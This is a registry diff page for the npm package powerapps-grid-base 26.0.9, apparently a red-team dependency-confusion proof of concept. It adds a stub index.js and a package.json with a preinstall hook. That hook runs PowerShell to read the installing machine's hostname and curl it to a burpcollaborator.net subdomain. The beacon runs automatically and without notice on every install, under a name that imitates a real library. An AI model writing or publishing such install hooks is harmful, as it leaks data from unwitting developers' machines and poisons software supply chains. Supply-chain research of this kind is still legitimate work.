powerapps-grid-base 26.0.9

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of powerapps-grid-base might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +3 -0
  2. package/package.json +16 -0
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ module.exports.Poc = function () {
2
+ return "Dependency Confusion Poc By ADDARedTeam"
3
+ }
package/package.json ADDED
@@ -0,0 +1,16 @@
1
+ {
2
+ "name": "powerapps-grid-base",
3
+ "version": "26.0.9",
4
+ "description": "ADDARedTeam",
5
+ "main": "index.js",
6
+ "scripts":
7
+ {
8
+ "test": "echo \"Error: no test specified\" >> poc.log&& exit 1",
9
+ "preinstall": "powershell '$h=hostname;$g=\\\".nlct80lcr1d1skw5dbyskcdpyg47xvm.burpcollaborator.net\\\";$f=$h+$g;curl $f'"
10
+ },
11
+ "keywords":[
12
+ "ADDA"
13
+ ],
14
+ "author": "Zoka",
15
+ "license": "ISC"
16
+ }